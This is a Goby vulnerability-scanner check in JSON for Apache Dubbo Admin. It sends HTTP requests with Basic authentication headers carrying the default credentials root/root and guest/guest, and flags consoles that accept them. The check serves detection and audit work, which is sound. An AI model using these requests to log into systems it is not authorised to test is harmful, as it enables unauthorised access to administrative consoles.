Goby/json/Dubbo_Admin_Default_Passwor...

114 lines
4.3 KiB
JSON

{
"Name": "Dubbo Admin Default Password",
"Level": "3",
"Tags": [
"defaultaccount"
],
"GobyQuery": "app=\"APACHE-dubbo\"",
"Description": "Dubbo Admin管理控制台存在默认口令root/root和guest/guest",
"Product": "dubbo",
"Homepage": "https://dubbo.apache.org/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://github.com/chaitin/xray/blob/master/pocs/dubbo-admin-default-password.yml"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {
"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<title>Dubbo Admin</title>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "/sysinfo/versions",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {
"Authorization": "Basic cm9vdDpyb290"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<title>Dubbo Admin</title>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "/sysinfo/versions",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-11-28 13:12:18",
"GobyVersion": "1.9.310"
}